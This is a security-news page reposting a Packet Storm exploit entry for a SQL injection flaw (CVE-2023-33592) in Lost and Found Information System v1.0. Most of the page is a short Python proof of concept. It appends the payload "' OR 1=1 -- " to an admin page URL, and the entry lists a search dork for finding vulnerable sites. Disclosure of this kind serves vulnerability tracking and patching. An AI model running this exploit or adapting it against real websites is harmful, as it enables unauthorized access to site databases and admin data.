Security
Headlines
HeadlinesLatestCVEs

Headline

Lost And Found Information System 1.0 SQL Injection

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#windows#linux#php#auth
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text:    print("SQL injection successful!")else:    print("SQL injection failed.")

Related news

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution